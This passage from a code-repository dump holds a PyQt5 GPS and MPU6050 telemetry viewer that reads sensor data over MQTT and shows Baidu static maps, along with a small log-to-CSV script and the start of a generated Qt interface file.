"text": "# -*- coding: utf-8 -*-\r\n\r\nimport Map\r\nimport paho.mqtt.client as mqtt\r\nimport requests\r\nfrom PyQt5 import QtCore, QtGui, QtWidgets\r\nfrom PyQt5.QtWidgets import QApplication\r\nfrom PyQt5.QtGui import QPixmap\r\nimport sys\r\nimport os\r\nimport threading\r\nfrom PIL import Image\r\nimport ctypes\r\nimport inspect\r\nimport time\r\n\r\nMQTTHOST = \"139.199.208.33\"\r\nMQTTPORT = 1883\r\nUSERNAME = \"\"\r\nPASSWORD = \"\"\r\nTOPIC = r'/CC3200@SHIP/2/SHIPDATA/SENSORDATA'\r\nCLIENTID = \"SXF_Python_GPSMap\"\r\nHEARTBEAT = 60\r\nclient = mqtt.Client(CLIENTID)\r\nlongitude_last = 0.0\r\nlatitude_last = 0.0\r\nt_cnt = 0\r\n\r\n\r\nclass GPS_Data(object):\r\n def __init__(self):\r\n self.UTC_year = 0 # 年份\r\n self.UTC_mon = 0 # 月份\r\n self.UTC_day = 0 # 日期\r\n self.UTC_hor = 0 # 小时\r\n self.UTC_min = 0 # 分钟\r\n self.UTC_sec = 0.0 # 秒钟\r\n self.status = '' # 定位状态: A, 有效定位; V, 无效定位\r\n self.latitude = 0.0 # 纬度\r\n self.lat_hemisphere = '' # 纬度半球, N: 北纬; S: 南纬\r\n self.longitude = 0.0 # 经度\r\n self.lon_hemisphere = '' # 经度半球, E: 东经; W: 西经\r\n self.speed = 0.0 # 地面速率, 单位: 1公里 / 小时\r\n self.course = 0.0 # 地面航向, 0~359.9°\r\n self.declination = 0.0 # 磁偏角, 0~180.0°\r\n self.declination_dir = '' # 磁偏角方向, E, 东; W, 西\r\n self.mode = '' # 模式指示, A自主定位;D查分;E估算; N数据无效\r\n\r\n\r\nclass MyMainWindow(Map.Ui_MainWindow):\r\n def __init__(self):\r\n self.thread_list = []\r\n self.label_debug_cnt = 0\r\n self.label_debug_string = \"\"\r\n self.gps_list_string = \"\"\r\n\r\n def setupUi(self, MainWindow):\r\n MainWindow.setFixedSize(1120, 710) # 禁止最大化和调整窗口大小\r\n super(MyMainWindow, self).setupUi(MainWindow)\r\n\r\n def Start(self):\r\n self.Clear()\r\n self.Label_Debug(\">> 启动中...\")\r\n mqtt_thread = threading.Thread(target=self.mqtt)\r\n mqtt_thread.start()\r\n self.thread_list.append(mqtt_thread)\r\n\r\n def Stop(self):\r\n try:\r\n client.loop_stop()\r\n self.stop_thread(self.thread_list.pop())\r\n self.Label_Debug(\"终止成功!\")\r\n print(\"终止成功!\")\r\n except Exception as e:\r\n self.Label_Debug(str(e))\r\n print(e)\r\n\r\n def Reset(self):\r\n self.label_status.setText(\"A有效;V无效\")\r\n self.label_mode.setText(\"A自主;D差分;E估算; N无效\")\r\n self.label_time.setText(\"年/月/日 时:分:秒\")\r\n self.label_lat.setText(\"N北纬;S南纬\")\r\n self.label_lon.setText(\"E东经;W西经\")\r\n self.label_speed.setText(\"公里/小时\")\r\n self.label_course.setText(\"0~359.9°\")\r\n self.label_declination.setText(\"0~180.0°\")\r\n self.label_declination_dir.setText(\"E东;W西\")\r\n self.label_debug.setText(\"DeBug Here\")\r\n self.label_img.setText(\"GPS Map Here\")\r\n self.lineEdit_topic_rec.setText(\"\")\r\n self.label_roll_v.setText(\"\")\r\n self.label_roll_dot.setText(\"\")\r\n self.label_pitch_v.setText(\"\")\r\n self.label_pitch_dot.setText(\"\")\r\n self.label_yaw_v.setText(\"\")\r\n self.label_yaw_dot.setText(\"\")\r\n\r\n def Clear(self):\r\n self.label_debug_cnt = 13\r\n self.Label_Debug(\"\")\r\n\r\n def Subs(self):\r\n global MQTTHOST, MQTTPORT, USERNAME, PASSWORD, TOPIC, CLIENTID, HEARTBEAT\r\n self.Clear()\r\n MQTTHOST = self.lineEdit_host.text()\r\n MQTTPORT = int(self.lineEdit_port.text() or 1883)\r\n USERNAME = self.lineEdit_username.text()\r\n PASSWORD = self.lineEdit_password.text()\r\n TOPIC = self.lineEdit_topic.text()\r\n CLIENTID = self.lineEdit_clientid.text()\r\n HEARTBEAT = int(self.lineEdit_heartbeat.text() or 60)\r\n self.pushButton_submit.setText(\"√\")\r\n QApplication.processEvents()\r\n time.sleep(1)\r\n self.pushButton_submit.setText(\"Submit\")\r\n self.Label_Debug(\"*\"*60+\">> 配置成功! 
<<\\r\\n\"+\"Host:%s\\r\\nPort:%s\\r\\nUsr:%s\\r\\nPwd:%s\\r\\nId:%s\\r\\nBeat:%s\\r\\nTopic:%s\\r\\n\" % (\r\n MQTTHOST, MQTTPORT, USERNAME, PASSWORD, CLIENTID, HEARTBEAT, TOPIC\r\n ) + \"*\"*60)\r\n\r\n def Label_Debug(self, string):\r\n if self.label_debug_cnt == 13:\r\n self.label_debug_string = \"\"\r\n self.label_debug.setText(self.label_debug_string)\r\n self.label_debug_cnt = 0\r\n self.label_debug_string += string + \"\\r\\n\"\r\n self.label_debug.setText(self.label_debug_string)\r\n self.label_debug_cnt += 1\r\n\r\n def on_connect(self, client, userdata, flags, rc):\r\n print(\"Connected with result code \" + str(rc))\r\n self.Label_Debug(\"Connected with result code \" + str(rc))\r\n self.Label_Debug(\"订阅主题 -> %s\" % TOPIC)\r\n client.subscribe(TOPIC)\r\n\r\n def on_message(self, client, userdata, msg):\r\n global t_cnt\r\n MQTT_Rx_Buff = str(msg.payload, encoding=\"utf-8\")\r\n self.lineEdit_topic_rec.setText(msg.topic)\r\n self.GPS_Calculate(MQTT_Rx_Buff)\r\n self.MPU6050_Calculate(MQTT_Rx_Buff)\r\n t_cnt += 1\r\n if t_cnt > 2:\r\n t_cnt = 0\r\n self.gps_map_main(GPS_Data.longitude, GPS_Data.latitude)\r\n\r\n def mqtt(self):\r\n client.on_connect = self.on_connect\r\n client.on_message = self.on_message\r\n client.username_pw_set(USERNAME, PASSWORD)\r\n client.connect(MQTTHOST, MQTTPORT, HEARTBEAT)\r\n # client.loop_forever() # 阻塞\r\n client.loop_start() # 线程\r\n\r\n def GPS_Calculate(self, GPS_Buff):\r\n if \"$GNRMC\" not in GPS_Buff:\r\n return\r\n GPS_Buff = GPS_Buff.split(',')\r\n GPS_Data.UTC_hor = int(GPS_Buff[1][0:2]) + 8\r\n GPS_Data.UTC_min = int(GPS_Buff[1][2:4])\r\n GPS_Data.UTC_sec = float(GPS_Buff[1][4:9])\r\n GPS_Data.status = GPS_Buff[2]\r\n GPS_Data.latitude = '%.6f' % (float(GPS_Buff[3][0:2]) + float(GPS_Buff[3][2:]) / 60) # 度\r\n GPS_Data.lat_hemisphere = GPS_Buff[4]\r\n GPS_Data.longitude = '%.6f' % (float(GPS_Buff[5][0:3]) + float(GPS_Buff[5][3:]) / 60) # 度\r\n GPS_Data.lon_hemisphere = GPS_Buff[6]\r\n GPS_Data.speed = GPS_Buff[7]\r\n GPS_Data.course = GPS_Buff[8]\r\n GPS_Data.UTC_year = GPS_Buff[9][4:]\r\n GPS_Data.UTC_mon = GPS_Buff[9][2:4]\r\n GPS_Data.UTC_day = GPS_Buff[9][0:2]\r\n GPS_Data.declination = GPS_Buff[10]\r\n GPS_Data.declination_dir = GPS_Buff[11]\r\n GPS_Data.mode = GPS_Buff[12][0]\r\n\r\n self.label_status.setText(GPS_Data.status)\r\n self.label_mode.setText(GPS_Data.mode)\r\n self.label_time.setText(\"%s/%s/%s %s:%s:%s\" % (GPS_Data.UTC_year,GPS_Data.UTC_mon,GPS_Data.UTC_day,GPS_Data.UTC_hor,GPS_Data.UTC_min,GPS_Data.UTC_sec))\r\n self.label_lat.setText(\"%s°%s\" % (GPS_Data.latitude, GPS_Data.lat_hemisphere))\r\n self.label_lon.setText(\"%s°%s\" % (GPS_Data.longitude, GPS_Data.lon_hemisphere))\r\n self.label_speed.setText(\"%s km/h\" % GPS_Data.speed)\r\n self.label_course.setText(\"%s°\" % GPS_Data.course)\r\n self.label_declination.setText(\"%s°\" % GPS_Data.declination)\r\n self.label_declination_dir.setText(\"%s\" % GPS_Data.declination_dir)\r\n\r\n print(\"*\" * 60)\r\n print(\"状态:%s; 模式:%s\" % (GPS_Data.status, GPS_Data.mode))\r\n print(\"时间:%s/%s/%s %s:%s:%s\" % (\r\n GPS_Data.UTC_year, GPS_Data.UTC_mon, GPS_Data.UTC_day, GPS_Data.UTC_hor, GPS_Data.UTC_min, GPS_Data.UTC_sec))\r\n print(\"纬度:%s°%s; 经度:%s°%s\" % (\r\n GPS_Data.latitude, GPS_Data.lat_hemisphere, GPS_Data.longitude, GPS_Data.lon_hemisphere))\r\n print(\"速率:%s; 航向:%s\" % (GPS_Data.speed, GPS_Data.course))\r\n\r\n self.Label_Debug(\"*\" * 60)\r\n self.Label_Debug(\"状态:%s; 模式:%s\" % (GPS_Data.status, GPS_Data.mode))\r\n self.Label_Debug(\"时间:%s/%s/%s %s:%s:%s\" % (\r\n 
GPS_Data.UTC_year, GPS_Data.UTC_mon, GPS_Data.UTC_day, GPS_Data.UTC_hor, GPS_Data.UTC_min, GPS_Data.UTC_sec))\r\n self.Label_Debug(\"纬度:%s°%s; 经度:%s°%s\" % (\r\n GPS_Data.latitude, GPS_Data.lat_hemisphere, GPS_Data.longitude, GPS_Data.lon_hemisphere))\r\n self.Label_Debug(\"速率:%s; 航向:%s\" % (GPS_Data.speed, GPS_Data.course))\r\n\r\n def MPU6050_Calculate(self, MPU6050_Buff):\r\n if \"$MPU6050\" not in MPU6050_Buff:\r\n return\r\n MPU6050_Buff = MPU6050_Buff.split(',')\r\n roll_v = MPU6050_Buff[1] # 滚转角(roll)x\r\n roll_dot = MPU6050_Buff[2]\r\n pitch_v = MPU6050_Buff[3] # 俯仰角(pitch)y\r\n pitch_dot = MPU6050_Buff[4]\r\n yaw_v = MPU6050_Buff[5] # 偏航角(yaw)z\r\n yaw_dot = MPU6050_Buff[6]\r\n self.label_roll_v.setText(roll_v)\r\n self.label_roll_dot.setText(roll_dot)\r\n self.label_pitch_v.setText(pitch_v)\r\n self.label_pitch_dot.setText(pitch_dot)\r\n self.label_yaw_v.setText(yaw_v)\r\n self.label_yaw_dot.setText(yaw_dot)\r\n with open(os.getcwd()+r'\\mpu6050.txt',\"a+\") as f:\r\n \tstring = \"%s,%s;%s,%s;%s,%s;\\r\\n\" % (roll_v,roll_dot,pitch_v,pitch_dot,yaw_v,yaw_dot)\r\n \tf.write(string)\r\n \tf.close()\r\n\r\n def gps2baidu(self, longitude, latitude):\r\n try:\r\n url_base = r'http://api.map.baidu.com/geoconv/v1/?from=1'\r\n ak = ''\r\n coords = str(longitude) + ',' + str(latitude)\r\n url = \"%s&ak=%s&coords=%s\" % (url_base, ak, coords)\r\n html_json = requests.get(url).json()\r\n longitude_baidu = html_json['result'][0]['x'] # 经度\r\n latitude_baidu = html_json['result'][0]['y'] # 纬度\r\n except Exception as e:\r\n print(e)\r\n url = \"http://map.yanue.net/gpsapi.php?lat=%s&lng=%s&\" % (latitude, longitude)\r\n html_json = requests.get(url).json()\r\n longitude_baidu = html_json['baidu']['lng'] # 经度\r\n latitude_baidu = html_json['baidu']['lat'] # 纬度\r\n return longitude_baidu, latitude_baidu\r\n\r\n def map_show(self, longitude, latitude):\r\n url_base = r'http://api.map.baidu.com/staticimage/v2?'\r\n center = str(longitude) + ',' + str(latitude)\r\n markers = str(longitude) + ',' + str(latitude)\r\n ak = ''\r\n height = 600\r\n width = 600\r\n url = \"%s&zoom=19&ak=%s¢er=%s&markers=%s&height=%s&width=%s\" % (\r\n url_base, ak, center, markers, height, width)\r\n html = requests.get(url)\r\n self.Label_Debug(\">> 获取静态地图 <<\")\r\n print(\">> 获取静态地图 <<\")\r\n with open(\"map.jpg\", 'wb') as f:\r\n f.write(html.content)\r\n f.close()\r\n\r\n def gps_map_main(self, longitude, latitude):\r\n global longitude_last\r\n global latitude_last\r\n if GPS_Data.status != 'A' or GPS_Data.mode != 'A':\r\n self.Label_Debug(\">> 无效定位 <<\")\r\n print(\">> 无效定位 <<\")\r\n return\r\n if longitude_last == longitude or latitude_last == latitude:\r\n self.Label_Debug(\">> 坐标未更新 <<\")\r\n print(\">> 坐标未更新 <<\")\r\n self.label_gpsupdate.setStyleSheet(\"color: rgb(0, 255, 0);;\")\r\n self.label_gpsupdate.setText(\"坐标未更新\")\r\n return\r\n self.Label_Debug(\">> 有效定位 <<\")\r\n print(\">> 有效定位 <<\")\r\n longitude_last = longitude\r\n latitude_last = latitude\r\n lon_baidu, lat_baidu = self.gps2baidu(longitude, latitude)\r\n self.Label_Debug(\">> 坐标已更新 <<\")\r\n print(\">> 坐标已更新 <<\")\r\n self.label_gpsupdate.setStyleSheet(\"color: rgb(255, 0, 0);\")\r\n self.label_gpsupdate.setText(\"坐标已更新\")\r\n\r\n self.gps_list_string += (\"%s,%s;\" % (longitude, latitude))\r\n self.map_show(lon_baidu, lat_baidu)\r\n self.Update_GPSImage()\r\n\r\n with open(os.getcwd()+r'\\gps.txt',\"a+\") as f:\r\n \tprint(os.getcwd()+\"gps.txt\")\r\n \tstring = \"UTC:%s/%s/%s %s:%s:%s; 纬度:%s°%s; 经度:%s°%s; 速率:%s; 航向:%s\\r\\n\" % 
(GPS_Data.UTC_year, GPS_Data.UTC_mon, GPS_Data.UTC_day, GPS_Data.UTC_hor, GPS_Data.UTC_min, GPS_Data.UTC_sec,GPS_Data.latitude, GPS_Data.lat_hemisphere, GPS_Data.longitude, GPS_Data.lon_hemisphere,GPS_Data.speed, GPS_Data.course)\r\n \tf.write(string)\r\n \tf.close()\r\n\r\n\r\n def Update_GPSImage(self):\r\n image = Image.open('map.jpg')\r\n image.save('map.png')\r\n print(\"OK - 0\")\r\n pix = QPixmap('map.png')\r\n print(\"OK - 1\")\r\n self.label_img.setPixmap(pix)\r\n print(\"OK - 2\")\r\n QApplication.processEvents()\r\n os.remove('map.jpg')\r\n os.remove('map.png')\r\n print(\"OK - 3\")\r\n\r\n\r\n################################强制关闭线程##################################################\r\n def _async_raise(self, tid, exctype):\r\n \"\"\"raises the exception, performs cleanup if needed\"\"\"\r\n tid = ctypes.c_long(tid)\r\n if not inspect.isclass(exctype):\r\n exctype = type(exctype)\r\n res = ctypes.pythonapi.PyThreadState_SetAsyncExc(tid, ctypes.py_object(exctype))\r\n if res == 0:\r\n raise ValueError(\"invalid thread id\")\r\n elif res != 1:\r\n # \"\"\"if it returns a number greater than one, you're in trouble,\r\n # and you should call it again with exc=NULL to revert the effect\"\"\"\r\n ctypes.pythonapi.PyThreadState_SetAsyncExc(tid, None)\r\n raise SystemError(\"PyThreadState_SetAsyncExc failed\")\r\n\r\n def stop_thread(self, thread):\r\n self._async_raise(thread.ident, SystemExit)\r\n###############################################################################################\r\n\r\n\r\ndef ui_main():\r\n app = QtWidgets.QApplication(sys.argv)\r\n MainWindow = QtWidgets.QMainWindow()\r\n ui = MyMainWindow()\r\n ui.setupUi(MainWindow)\r\n MainWindow.show()\r\n sys.exit(app.exec_())\r\n\r\n\r\nif __name__ == '__main__':\r\n ui_main()\r\n\r\n\r\n"
},
{
"alpha_fraction": 0.5059602856636047,
"alphanum_fraction": 0.5317880511283875,
"avg_line_length": 33.75609588623047,
"blob_id": "7aad2447a93cb12e9a1b6042b3846a0ef7846427",
"content_id": "098514cb44b1aa71788ee88c7e6d7cedac8ba987",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1510,
"license_type": "no_license",
"max_line_length": 115,
"num_lines": 41,
"path": "/Py/process.py",
"repo_name": "asic1123/GPS_UpperComputer_MQTT",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\r\n\r\nimport os\r\nimport csv\r\n\r\n# with open(os.getcwd()+r'\\gps.txt', 'r') as f:\r\n# \twith open(os.getcwd()+r'\\gps.csv', 'w', newline='') as f_csv:\r\n# \t\tcontents = f.readlines()\r\n# \t\tfor i in contents:\r\n# \t\t\tlists = i.split(';')\r\n# \t\t\tUTC = \"%s:%s:%s\" % (int(lists[0].split(':')[1].split(' ')[1])-4,lists[0].split(':')[2],lists[0].split(':')[3])\r\n# \t\t\tweidu = lists[1].split(':')[1].strip('N')\r\n# \t\t\tjingdu = lists[2].split(':')[1].strip('E')\r\n# \t\t\tspeed = lists[3].split(':')[1]\r\n# \t\t\thangxiang = lists[4].split(':')[1]\r\n# \t\t\t# print(UTC,weidu,jingdu,speed,hangxiang)\r\n# \t\t\tcsv_writer = csv.writer(f_csv)\r\n# \t\t\tcsv_row = [str(UTC),str(weidu),str(jingdu),str(speed),str(hangxiang)]\r\n# \t\t\tcsv_writer.writerow(csv_row)\r\n# \t\tf_csv.close()\r\n# \tf.close()\r\n\r\n\r\n\r\nwith open(os.getcwd()+r'\\mpu6050.txt', 'r') as f:\r\n\twith open(os.getcwd()+r'\\mpu6050.csv', 'w', newline='') as f_csv:\r\n\t\tcontents = f.readlines()\r\n\t\tfor i in contents:\r\n\t\t\tlists = i.split(';')\r\n\t\t\t# print(lists[0].split(',')[1])\r\n\t\t\troll_v = lists[0].split(',')[0].strip()\r\n\t\t\troll_dot = lists[0].split(',')[1].strip()\r\n\t\t\tpitch_v = lists[1].split(',')[0].strip()\r\n\t\t\tpitch_dot = lists[1].split(',')[1].strip()\r\n\t\t\tyaw_v = lists[2].split(',')[0].strip()\r\n\t\t\tyaw_dot = lists[2].split(',')[1].strip()\r\n\t\t\tcsv_writer = csv.writer(f_csv)\r\n\t\t\tcsv_row = [str(roll_v),str(roll_dot),str(pitch_v),str(pitch_dot),str(yaw_v),str(yaw_dot)]\r\n\t\t\tcsv_writer.writerow(csv_row)\r\n\t\tf_csv.close()\r\n\tf.close()\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n"
},
{
"alpha_fraction": 0.648666501045227,
"alphanum_fraction": 0.6786035299301147,
"avg_line_length": 53.3628044128418,
"blob_id": "1c7db49939083c511b99239be5157668cc18fa93",
"content_id": "1cfdb7b1bbdce2a144b225abd4097bc374d12ae1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 54931,
"license_type": "no_license",
"max_line_length": 116,
"num_lines": 984,
"path": "/Py/Map.py",
"repo_name": "asic1123/GPS_UpperComputer_MQTT",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\r\n\r\n# Form implementation generated from reading ui file 'mainwindow.ui'\r\n#\r\n# Created by: PyQt5 UI code generator 5.12.1\r\n#\r\n# WARNING! All changes made in this file will be lost!\r\n\r\nfrom PyQt5 import QtCore, QtGui, QtWidgets\r\n\r\n\r\nclass Ui_MainWindow(object):\r\n def setupUi(self, MainWindow):\r\n MainWindow.setObjectName(\"MainWindow\")\r\n MainWindow.resize(1120, 710)\r\n sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Preferred)\r\n sizePolicy.setHorizontalStretch(0)\r\n sizePolicy.setVerticalStretch(0)\r\n sizePolicy.setHeightForWidth(MainWindow.sizePolicy().hasHeightForWidth())\r\n MainWindow.setSizePolicy(sizePolicy)\r\n MainWindow.setMinimumSize(QtCore.QSize(1120, 710))\r\n MainWindow.setAutoFillBackground(False)\r\n MainWindow.setStyleSheet(\"\")\r\n self.centralWidget = QtWidgets.QWidget(MainWindow)\r\n self.centralWidget.setObjectName(\"centralWidget\")\r\n self.tabWidget = QtWidgets.QTabWidget(self.centralWidget)\r\n self.tabWidget.setGeometry(QtCore.QRect(0, 0, 1131, 711))\r\n self.tabWidget.setMinimumSize(QtCore.QSize(0, 0))\r\n font = QtGui.QFont()\r\n font.setFamily(\"Times New Roman\")\r\n font.setPointSize(10)\r\n self.tabWidget.setFont(font)\r\n self.tabWidget.setIconSize(QtCore.QSize(16, 16))\r\n self.tabWidget.setMovable(True)\r\n self.tabWidget.setObjectName(\"tabWidget\")\r\n self.tab_3 = QtWidgets.QWidget()\r\n self.tab_3.setObjectName(\"tab_3\")\r\n self.horizontalLayoutWidget_4 = QtWidgets.QWidget(self.tab_3)\r\n self.horizontalLayoutWidget_4.setGeometry(QtCore.QRect(250, 390, 621, 52))\r\n self.horizontalLayoutWidget_4.setObjectName(\"horizontalLayoutWidget_4\")\r\n self.horizontalLayout_7 = QtWidgets.QHBoxLayout(self.horizontalLayoutWidget_4)\r\n self.horizontalLayout_7.setContentsMargins(11, 11, 11, 11)\r\n self.horizontalLayout_7.setSpacing(6)\r\n self.horizontalLayout_7.setObjectName(\"horizontalLayout_7\")\r\n self.label_11 = QtWidgets.QLabel(self.horizontalLayoutWidget_4)\r\n font = QtGui.QFont()\r\n font.setFamily(\"Times New Roman\")\r\n font.setPointSize(12)\r\n self.label_11.setFont(font)\r\n self.label_11.setTextFormat(QtCore.Qt.PlainText)\r\n self.label_11.setAlignment(QtCore.Qt.AlignCenter)\r\n self.label_11.setObjectName(\"label_11\")\r\n self.horizontalLayout_7.addWidget(self.label_11)\r\n self.lineEdit_topic = QtWidgets.QLineEdit(self.horizontalLayoutWidget_4)\r\n self.lineEdit_topic.setMinimumSize(QtCore.QSize(0, 30))\r\n font = QtGui.QFont()\r\n font.setFamily(\"Times New Roman\")\r\n font.setPointSize(10)\r\n self.lineEdit_topic.setFont(font)\r\n self.lineEdit_topic.setObjectName(\"lineEdit_topic\")\r\n self.horizontalLayout_7.addWidget(self.lineEdit_topic)\r\n self.pushButton_submit = QtWidgets.QPushButton(self.horizontalLayoutWidget_4)\r\n self.pushButton_submit.setMinimumSize(QtCore.QSize(0, 35))\r\n font = QtGui.QFont()\r\n font.setFamily(\"Times New Roman\")\r\n font.setPointSize(12)\r\n self.pushButton_submit.setFont(font)\r\n self.pushButton_submit.setCursor(QtGui.QCursor(QtCore.Qt.PointingHandCursor))\r\n self.pushButton_submit.setObjectName(\"pushButton_submit\")\r\n self.horizontalLayout_7.addWidget(self.pushButton_submit)\r\n self.horizontalLayoutWidget_5 = QtWidgets.QWidget(self.tab_3)\r\n self.horizontalLayoutWidget_5.setGeometry(QtCore.QRect(250, 110, 621, 80))\r\n self.horizontalLayoutWidget_5.setObjectName(\"horizontalLayoutWidget_5\")\r\n self.horizontalLayout_8 = QtWidgets.QHBoxLayout(self.horizontalLayoutWidget_5)\r\n 
self.horizontalLayout_8.setContentsMargins(11, 11, 11, 11)\r\n self.horizontalLayout_8.setSpacing(6)\r\n self.horizontalLayout_8.setObjectName(\"horizontalLayout_8\")\r\n self.label_12 = QtWidgets.QLabel(self.horizontalLayoutWidget_5)\r\n font = QtGui.QFont()\r\n font.setFamily(\"Times New Roman\")\r\n font.setPointSize(12)\r\n self.label_12.setFont(font)\r\n self.label_12.setObjectName(\"label_12\")\r\n self.horizontalLayout_8.addWidget(self.label_12)\r\n self.lineEdit_host = QtWidgets.QLineEdit(self.horizontalLayoutWidget_5)\r\n self.lineEdit_host.setMinimumSize(QtCore.QSize(0, 30))\r\n font = QtGui.QFont()\r\n font.setFamily(\"Times New Roman\")\r\n font.setPointSize(10)\r\n self.lineEdit_host.setFont(font)\r\n self.lineEdit_host.setAlignment(QtCore.Qt.AlignCenter)\r\n self.lineEdit_host.setObjectName(\"lineEdit_host\")\r\n self.horizontalLayout_8.addWidget(self.lineEdit_host)\r\n spacerItem = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)\r\n self.horizontalLayout_8.addItem(spacerItem)\r\n self.label_13 = QtWidgets.QLabel(self.horizontalLayoutWidget_5)\r\n font = QtGui.QFont()\r\n font.setFamily(\"Times New Roman\")\r\n font.setPointSize(12)\r\n self.label_13.setFont(font)\r\n self.label_13.setObjectName(\"label_13\")\r\n self.horizontalLayout_8.addWidget(self.label_13)\r\n self.lineEdit_port = QtWidgets.QLineEdit(self.horizontalLayoutWidget_5)\r\n self.lineEdit_port.setMinimumSize(QtCore.QSize(0, 30))\r\n font = QtGui.QFont()\r\n font.setFamily(\"Times New Roman\")\r\n font.setPointSize(10)\r\n self.lineEdit_port.setFont(font)\r\n self.lineEdit_port.setAlignment(QtCore.Qt.AlignCenter)\r\n self.lineEdit_port.setObjectName(\"lineEdit_port\")\r\n self.horizontalLayout_8.addWidget(self.lineEdit_port)\r\n self.horizontalLayoutWidget_6 = QtWidgets.QWidget(self.tab_3)\r\n self.horizontalLayoutWidget_6.setGeometry(QtCore.QRect(250, 200, 621, 80))\r\n self.horizontalLayoutWidget_6.setObjectName(\"horizontalLayoutWidget_6\")\r\n self.horizontalLayout_9 = QtWidgets.QHBoxLayout(self.horizontalLayoutWidget_6)\r\n self.horizontalLayout_9.setContentsMargins(11, 11, 11, 11)\r\n self.horizontalLayout_9.setSpacing(6)\r\n self.horizontalLayout_9.setObjectName(\"horizontalLayout_9\")\r\n self.label_14 = QtWidgets.QLabel(self.horizontalLayoutWidget_6)\r\n font = QtGui.QFont()\r\n font.setFamily(\"Times New Roman\")\r\n font.setPointSize(12)\r\n self.label_14.setFont(font)\r\n self.label_14.setObjectName(\"label_14\")\r\n self.horizontalLayout_9.addWidget(self.label_14)\r\n self.lineEdit_username = QtWidgets.QLineEdit(self.horizontalLayoutWidget_6)\r\n self.lineEdit_username.setMinimumSize(QtCore.QSize(0, 30))\r\n font = QtGui.QFont()\r\n font.setFamily(\"Times New Roman\")\r\n font.setPointSize(10)\r\n self.lineEdit_username.setFont(font)\r\n self.lineEdit_username.setAlignment(QtCore.Qt.AlignCenter)\r\n self.lineEdit_username.setObjectName(\"lineEdit_username\")\r\n self.horizontalLayout_9.addWidget(self.lineEdit_username)\r\n spacerItem1 = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)\r\n self.horizontalLayout_9.addItem(spacerItem1)\r\n self.label_15 = QtWidgets.QLabel(self.horizontalLayoutWidget_6)\r\n font = QtGui.QFont()\r\n font.setFamily(\"Times New Roman\")\r\n font.setPointSize(12)\r\n self.label_15.setFont(font)\r\n self.label_15.setObjectName(\"label_15\")\r\n self.horizontalLayout_9.addWidget(self.label_15)\r\n self.lineEdit_password = QtWidgets.QLineEdit(self.horizontalLayoutWidget_6)\r\n 
self.lineEdit_password.setMinimumSize(QtCore.QSize(0, 30))\r\n font = QtGui.QFont()\r\n font.setFamily(\"Times New Roman\")\r\n font.setPointSize(10)\r\n self.lineEdit_password.setFont(font)\r\n self.lineEdit_password.setAlignment(QtCore.Qt.AlignCenter)\r\n self.lineEdit_password.setObjectName(\"lineEdit_password\")\r\n self.horizontalLayout_9.addWidget(self.lineEdit_password)\r\n self.horizontalLayoutWidget_7 = QtWidgets.QWidget(self.tab_3)\r\n self.horizontalLayoutWidget_7.setGeometry(QtCore.QRect(250, 290, 621, 80))\r\n self.horizontalLayoutWidget_7.setObjectName(\"horizontalLayoutWidget_7\")\r\n self.horizontalLayout_10 = QtWidgets.QHBoxLayout(self.horizontalLayoutWidget_7)\r\n self.horizontalLayout_10.setContentsMargins(11, 11, 11, 11)\r\n self.horizontalLayout_10.setSpacing(6)\r\n self.horizontalLayout_10.setObjectName(\"horizontalLayout_10\")\r\n self.label_16 = QtWidgets.QLabel(self.horizontalLayoutWidget_7)\r\n font = QtGui.QFont()\r\n font.setFamily(\"Times New Roman\")\r\n font.setPointSize(12)\r\n self.label_16.setFont(font)\r\n self.label_16.setObjectName(\"label_16\")\r\n self.horizontalLayout_10.addWidget(self.label_16)\r\n self.lineEdit_clientid = QtWidgets.QLineEdit(self.horizontalLayoutWidget_7)\r\n self.lineEdit_clientid.setMinimumSize(QtCore.QSize(0, 30))\r\n font = QtGui.QFont()\r\n font.setFamily(\"Times New Roman\")\r\n font.setPointSize(10)\r\n self.lineEdit_clientid.setFont(font)\r\n self.lineEdit_clientid.setAlignment(QtCore.Qt.AlignCenter)\r\n self.lineEdit_clientid.setObjectName(\"lineEdit_clientid\")\r\n self.horizontalLayout_10.addWidget(self.lineEdit_clientid)\r\n spacerItem2 = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)\r\n self.horizontalLayout_10.addItem(spacerItem2)\r\n self.label_17 = QtWidgets.QLabel(self.horizontalLayoutWidget_7)\r\n font = QtGui.QFont()\r\n font.setFamily(\"Times New Roman\")\r\n font.setPointSize(12)\r\n self.label_17.setFont(font)\r\n self.label_17.setObjectName(\"label_17\")\r\n self.horizontalLayout_10.addWidget(self.label_17)\r\n self.lineEdit_heartbeat = QtWidgets.QLineEdit(self.horizontalLayoutWidget_7)\r\n self.lineEdit_heartbeat.setMinimumSize(QtCore.QSize(0, 30))\r\n font = QtGui.QFont()\r\n font.setFamily(\"Times New Roman\")\r\n font.setPointSize(10)\r\n self.lineEdit_heartbeat.setFont(font)\r\n self.lineEdit_heartbeat.setAlignment(QtCore.Qt.AlignCenter)\r\n self.lineEdit_heartbeat.setObjectName(\"lineEdit_heartbeat\")\r\n self.horizontalLayout_10.addWidget(self.lineEdit_heartbeat)\r\n self.tabWidget.addTab(self.tab_3, \"\")\r\n self.tab = QtWidgets.QWidget()\r\n self.tab.setObjectName(\"tab\")\r\n self.horizontalLayoutWidget_2 = QtWidgets.QWidget(self.tab)\r\n self.horizontalLayoutWidget_2.setGeometry(QtCore.QRect(10, 5, 601, 52))\r\n self.horizontalLayoutWidget_2.setObjectName(\"horizontalLayoutWidget_2\")\r\n self.horizontalLayout_4 = QtWidgets.QHBoxLayout(self.horizontalLayoutWidget_2)\r\n self.horizontalLayout_4.setContentsMargins(11, 11, 11, 11)\r\n self.horizontalLayout_4.setSpacing(6)\r\n self.horizontalLayout_4.setObjectName(\"horizontalLayout_4\")\r\n self.label_10 = 